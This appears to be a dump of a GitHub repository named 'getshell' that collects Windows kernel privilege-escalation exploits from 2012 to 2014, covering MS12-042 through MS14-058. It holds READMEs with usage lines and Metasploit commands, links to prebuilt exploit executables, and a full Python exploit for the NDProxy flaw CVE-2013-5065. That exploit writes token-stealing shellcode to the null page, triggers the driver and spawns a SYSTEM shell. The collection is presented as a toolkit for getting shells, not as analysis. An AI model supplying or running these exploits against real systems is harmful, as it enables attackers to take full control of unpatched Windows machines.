-------------------------------------------------------------------------------- /MS12-042/sysret-source/sysret.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/sysret.suo -------------------------------------------------------------------------------- /MS12-042/sysret-source/x64/Release/MinHook.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/x64/Release/MinHook.x64.dll -------------------------------------------------------------------------------- /MS12-042/sysret-source/x64/Release/sysret.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/x64/Release/sysret.exe -------------------------------------------------------------------------------- /MS12-042/win7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/win7.png -------------------------------------------------------------------------------- /MS13-005/README.md: -------------------------------------------------------------------------------- 1 | # MS13-005 2 | 3 | ``` 4 | Due to a problem with isolating window broadcast messages in the Windows kernel, 5 | an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, 6 | thereby effecting a privilege escalation. 7 | This issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and RT. 8 | Note that spawning a command prompt with the shortcut key combination Win+Shift+# does not work in Vista, 9 | so the attacker will have to check if the user is already running a command prompt and set SPAWN_PROMPT false. 10 | Three exploit techniques are available with this module. 11 | The WEB technique will execute a powershell encoded payload from a Web location. 12 | The FILE technique will drop an executable to the file system, 13 | set it to medium integrity and execute it. 14 | The TYPE technique will attempt to execute a powershell encoded payload directly from the command line, 15 | but may take some time to complete. 16 | ``` 17 | - The exp was from [@0vercl0k](https://github.com/0vercl0k/stuffz/blob/master/ms13-005-funz-poc.cpp) 18 | 19 | Vulnerability reference: 20 | * [MS13-005](https://technet.microsoft.com/library/security/ms13-005) 21 | * [CVE-2013-0008](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0008) 22 | 23 | 24 | ## load the module within the msf 25 | - [msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms13_005_hwnd_broadcast) 26 | ``` 27 | msf > use exploit/windows/local/ms13_005_hwnd_broadcast 28 | msf exploit(ms13_005_hwnd_broadcast) > show targets 29 | ...targets... 30 | msf exploit(ms13_005_hwnd_broadcast) > set TARGET 31 | msf exploit(ms13_005_hwnd_broadcast) > show options 32 | ...show and set options... 33 | msf exploit(ms13_005_hwnd_broadcast) > exploit 34 | ``` 35 | 36 | ## Links 37 | 38 | - [HWND_BROADCAST](http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html) -------------------------------------------------------------------------------- /MS13-046/2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-046/2003.png -------------------------------------------------------------------------------- /MS13-046/MS13-046-KB2829361/epathobj_exp32(MS13-046).exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-046/MS13-046-KB2829361/epathobj_exp32(MS13-046).exe -------------------------------------------------------------------------------- /MS13-046/MS13-046-KB2829361/epathobj_exp64(MS13-046).exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-046/MS13-046-KB2829361/epathobj_exp64(MS13-046).exe -------------------------------------------------------------------------------- /MS13-046/README.md: -------------------------------------------------------------------------------- 1 | # MS13-046 2 | ``` 3 | dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2, 4 | Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, 5 | which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability." 6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS13-046](https://technet.microsoft.com/library/security/ms13-046) 10 | * [CVE-2013-1332](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1332) 11 | 12 | 13 | ## Usage 14 | ``` 15 | c:\> epathobj_exp32(MS13-046).exe cmd 16 | ``` 17 | ![2003](2003.png) 18 | ![win7](win7_local.png) 19 | 20 | ## References 21 | * [打破MS13-046不能webshell执行问题](http://www.91ri.org/6708.html) -------------------------------------------------------------------------------- /MS13-046/win7_local.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-046/win7_local.png -------------------------------------------------------------------------------- /MS13-053/2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-053/2003.png -------------------------------------------------------------------------------- /MS13-053/MS13-053-KB2850851.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-053/MS13-053-KB2850851.zip -------------------------------------------------------------------------------- /MS13-053/README.md: -------------------------------------------------------------------------------- 1 | # MS13-053 2 | ``` 3 | win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, 4 | Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, 5 | which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." 6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS13-053](https://technet.microsoft.com/library/security/ms13-053) 10 | * [CVE-2013-1300](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1300) 11 | * [CVE-2013-1340](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1340) 12 | * [CVE-2013-1345](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1345) 13 | * [CVE-2013-3129](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3129) 14 | * [CVE-2013-3167](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3167) 15 | * [CVE-2013-3172](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3172) 16 | * [CVE-2013-3173](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3173) 17 | * [CVE-2013-3660](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3660) 18 | 19 | ## Usage 20 | ``` 21 | c:\> MS13-053.exe 22 | ``` 23 | ![2003](2003.png) 24 | 25 | ## load the module within the Metasploit 26 | [msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms13_053_schlamperei) 27 | ``` 28 | msf > use exploit/windows/local/ms13_053_schlamperei 29 | msf exploit(ms13_053_schlamperei) > show targets 30 | ...targets... 31 | msf exploit(ms13_053_schlamperei) > set TARGET 32 | msf exploit(ms13_053_schlamperei) > show options 33 | ...show and set options... 34 | msf exploit(ms13_053_schlamperei) > exploit 35 | ``` 36 | 37 | ## References 38 | * [Adobe, Microsoft Release Critical Updates](https://krebsonsecurity.com/tag/ms13-053/) 39 | * [ms13_053_schlamperei.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_053_schlamperei.rb) 40 | -------------------------------------------------------------------------------- /MS14-002/CVE-2013-5065.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-002/CVE-2013-5065.exe -------------------------------------------------------------------------------- /MS14-002/CVE-2013-5065.py: -------------------------------------------------------------------------------- 1 | # NDPROXY Local SYSTEM privilege escalation 2 | # http://www.offensive-security.com 3 | # Tested on Windows XP SP3 4 | # http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/ 5 | 6 | 7 | # Original crash ... null pointer dereference 8 | # Access violation - code c0000005 (!!! second chance !!!) 9 | # 00000038 ?? ??? 10 | 11 | from ctypes import * 12 | from ctypes.wintypes import * 13 | import os, sys 14 | 15 | kernel32 = windll.kernel32 16 | ntdll = windll.ntdll 17 | 18 | GENERIC_READ = 0x80000000 19 | GENERIC_WRITE = 0x40000000 20 | FILE_SHARE_READ = 0x00000001 21 | FILE_SHARE_WRITE = 0x00000002 22 | NULL = 0x0 23 | OPEN_EXISTING = 0x3 24 | PROCESS_VM_WRITE = 0x0020 25 | PROCESS_VM_READ = 0x0010 26 | MEM_COMMIT = 0x00001000 27 | MEM_RESERVE = 0x00002000 28 | MEM_FREE = 0x00010000 29 | PAGE_EXECUTE_READWRITE = 0x00000040 30 | PROCESS_ALL_ACCESS = 2097151 31 | FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 32 | baseadd = c_int(0x00000001) 33 | MEMRES = (0x1000 | 0x2000) 34 | MEM_DECOMMIT = 0x4000 35 | PAGEEXE = 0x00000040 36 | null_size = c_int(0x1000) 37 | STATUS_SUCCESS = 0 38 | 39 | def log(msg): 40 | print msg 41 | 42 | def getLastError(): 43 | """[-] Format GetLastError""" 44 | buf = create_string_buffer(2048) 45 | if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, 46 | kernel32.GetLastError(), 0, 47 | buf, sizeof(buf), NULL): 48 | log(buf.value) 49 | else: 50 | log("[-] Unknown Error") 51 | 52 | print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" 53 | print "[*] Vulnerability found in the wild" 54 | print "[*] Coded by Offensive Security" 55 | 56 | tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) 57 | InBuf = c_char_p(tmp) 58 | 59 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) 60 | if dwStatus != STATUS_SUCCESS: 61 | print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus 62 | getLastError() 63 | written = c_ulong() 64 | sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" 65 | sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) 66 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) 67 | if alloc == 0: 68 | print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc 69 | getLastError() 70 | 71 | dwRetBytes = DWORD(0) 72 | DEVICE_NAME = "\\\\.\\NDProxy" 73 | hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) 74 | if hdev == -1: 75 | print "[-] Couldn't open the device... :(" 76 | sys.exit() 77 | kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) 78 | kernel32.CloseHandle(hdev) 79 | print "[+] Spawning SYSTEM Shell..." 80 | os.system("start /d \"C:\\windows\\system32\" cmd.exe") -------------------------------------------------------------------------------- /MS14-002/MS14-002.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-002/MS14-002.exe -------------------------------------------------------------------------------- /MS14-002/README.md: -------------------------------------------------------------------------------- 1 | # MS14-002 2 | 3 | ``` 4 | This module exploits a flaw in the ndproxy. 5 | sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. 6 | The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, 7 | where user provided input is used to access an array unsafely, and the value is used to perform a call, 8 | leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. 9 | This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. 10 | In order to work the service "Routing and Remote Access" must be running on the target system. 11 | ``` 12 | - The exp was from [@ev-zzo](https://github.com/dev-zzo/exploits-nt-privesc/blob/master/MS14-002/MS14-002.c) [@Tomislav Paskalev](https://www.exploit-db.com/exploits/37732/) [@ryujin](https://www.exploit-db.com/exploits/30014/) 13 | 14 | Vulnerability reference: 15 | * [MS14-002](https://technet.microsoft.com/library/security/ms14-002) 16 | * [CVE-2013-5065](https://www.exploit-db.com/exploits/39446/) 17 | 18 | 19 | ## Usage 20 | - c:\> MS14-002.exe XP 21 | - c:\> MS14-002.exe 2k3 22 | 23 | ![win2003](win2003.png) 24 | 25 | ## load the module within the msf 26 | - [msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms_ndproxy) 27 | 28 | ``` 29 | msf > use exploit/windows/local/ms_ndproxy 30 | msf exploit(ms_ndproxy) > show targets 31 | ...targets... 32 | msf exploit(ms_ndproxy) > set TARGET 33 | msf exploit(ms_ndproxy) > show options 34 | ...show and set options... 35 | msf exploit(ms_ndproxy) > exploit 36 | 37 | ``` 38 | ## Links 39 | 40 | - [The Kernel is calling a zero(day) pointer – CVE-2013-5065 – Ring Ring](https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Kernel-is-calling-a-zero(day)-pointer-–-CVE-2013-5065-–-Ring-Ring/) 41 | - [CVE-2013-5065: NDProxy array indexing error unpatched vulnerability](https://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/) 42 | 43 | -------------------------------------------------------------------------------- /MS14-002/win2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-002/win2003.png -------------------------------------------------------------------------------- /MS14-040/MS14-040-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-040/MS14-040-x64.exe -------------------------------------------------------------------------------- /MS14-040/MS14-40-x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-040/MS14-40-x86.exe -------------------------------------------------------------------------------- /MS14-040/README.md: -------------------------------------------------------------------------------- 1 | # MS14-040 2 | 3 | - The poc was from [@JeremyFetiveau](https://github.com/JeremyFetiveau/Exploits/blob/master/MS14-040.cpp) 4 | 5 | Vulnerability reference: 6 | * [MS14-040](https://technet.microsoft.com/library/security/ms14-040) 7 | * [CVE-2014-1767](https://www.exploit-db.com/exploits/39446/) 8 | 9 | 10 | ## Links 11 | 12 | - [AFD.sys Dangling Pointer Advisory](http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf) 13 | - [CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit](http://www.secniu.com/englishversioncve-2014-1767-afd-sys-double-free-vulnerability-analysis-and-exploit/) 14 | -------------------------------------------------------------------------------- /MS14-058/2008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/2008.png -------------------------------------------------------------------------------- /MS14-058/CVE-2014-4113-Exploit.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/CVE-2014-4113-Exploit.rar -------------------------------------------------------------------------------- /MS14-058/Exploit/.vs/Exploit/v14/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/.vs/Exploit/v14/.suo -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit.VC.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit.VC.db -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 2013 for Windows Desktop 4 | VisualStudioVersion = 12.0.31101.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Exploit", "Exploit\Exploit.vcxproj", "{47475E7C-FF81-4FAA-897B-3517562A2141}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Release|Win32 = Release|Win32 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {47475E7C-FF81-4FAA-897B-3517562A2141}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {47475E7C-FF81-4FAA-897B-3517562A2141}.Debug|Win32.Build.0 = Debug|Win32 16 | {47475E7C-FF81-4FAA-897B-3517562A2141}.Release|Win32.ActiveCfg = Release|Win32 17 | {47475E7C-FF81-4FAA-897B-3517562A2141}.Release|Win32.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit.v12.suo -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Exploit.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : Exploit Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this Exploit application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your Exploit application. 9 | 10 | 11 | Exploit.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | Exploit.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | Exploit.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named Exploit.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.log: -------------------------------------------------------------------------------- 1 |  stdafx.cpp 2 | Exploit.cpp 3 | 正在生成代码 4 | All 10 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 5 | 已完成代码的生成 6 | Exploit.vcxproj -> C:\Users\Hx\Desktop\39666\39666\Exploit\Release\Exploit.exe 7 | Exploit.vcxproj -> C:\Users\Hx\Desktop\39666\39666\Exploit\Release\Exploit.pdb (Full PDB) 8 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.obj -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.pch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.pch -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/Exploit.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1 2 | Release|Win32|C:\Users\Hx\Desktop\39666\39666\Exploit\| 3 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/stdafx.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/stdafx.obj -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/vc140.pdb -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Exploit.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Release/Exploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Release/Exploit.exe -------------------------------------------------------------------------------- /MS14-058/Exploit/Release/Exploit.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Release/Exploit.iobj -------------------------------------------------------------------------------- /MS14-058/Exploit/Release/Exploit.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Release/Exploit.ipdb -------------------------------------------------------------------------------- /MS14-058/Exploit/Release/Exploit.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Release/Exploit.pdb -------------------------------------------------------------------------------- /MS14-058/MS14-058.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/MS14-058.exe -------------------------------------------------------------------------------- /MS14-058/README.md: -------------------------------------------------------------------------------- 1 | # MS14-058 2 | 3 | - Trigger and exploit code for CVE-2014-4113 4 | - The poc was from [@sam-b](https://github.com/sam-b/CVE-2014-4113) 5 | 6 | Vulnerability reference: 7 | * [MS14-058](https://technet.microsoft.com/library/security/ms14-058) 8 | 9 | 10 | ## Usage 11 | c:\> Win64.exe whoami 12 | nt authority\system 13 | 14 | ![win7](win7.png) 15 | Cobalt Strike 2008 16 | ![2008](2008.png) 17 | ## load the module within the Metasploit console 18 | ``` 19 | msf > use exploit/windows/local/ms14_058_track_popup_menu 20 | msf exploit(ms14_058_track_popup_menu) > show targets 21 | ...targets... 22 | msf exploit(ms14_058_track_popup_menu) > set TARGET 23 | msf exploit(ms14_058_track_popup_menu) > show options 24 | ...show and set options... 25 | msf exploit(ms14_058_track_popup_menu) > exploit 26 | ``` 27 | 28 | ## Links 29 | 30 | - [CrowdStrike Discovers Use of 64-bit Zero-Day Privilege Escalation Exploit (CVE-2014-4113) by Hurricane Panda](https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/) 31 | - [让CVE-2014-4113成功溢出Win8](http://www.freebuf.com/articles/system/50110.html) -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger.opensdf: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 2013 for Windows Desktop 4 | VisualStudioVersion = 12.0.31101.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Trigger", "Trigger\Trigger.vcxproj", "{CAE544C2-0E50-41F6-9940-1EC88CB15E38}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Release|Win32 = Release|Win32 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {CAE544C2-0E50-41F6-9940-1EC88CB15E38}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {CAE544C2-0E50-41F6-9940-1EC88CB15E38}.Debug|Win32.Build.0 = Debug|Win32 16 | {CAE544C2-0E50-41F6-9940-1EC88CB15E38}.Release|Win32.ActiveCfg = Release|Win32 17 | {CAE544C2-0E50-41F6-9940-1EC88CB15E38}.Release|Win32.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Trigger/Trigger.v12.suo -------------------------------------------------------------------------------- /MS14-058/Trigger/Trigger/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : Trigger Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this Trigger application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your Trigger application. 9 | 10 | 11 | Trigger.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | Trigger.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 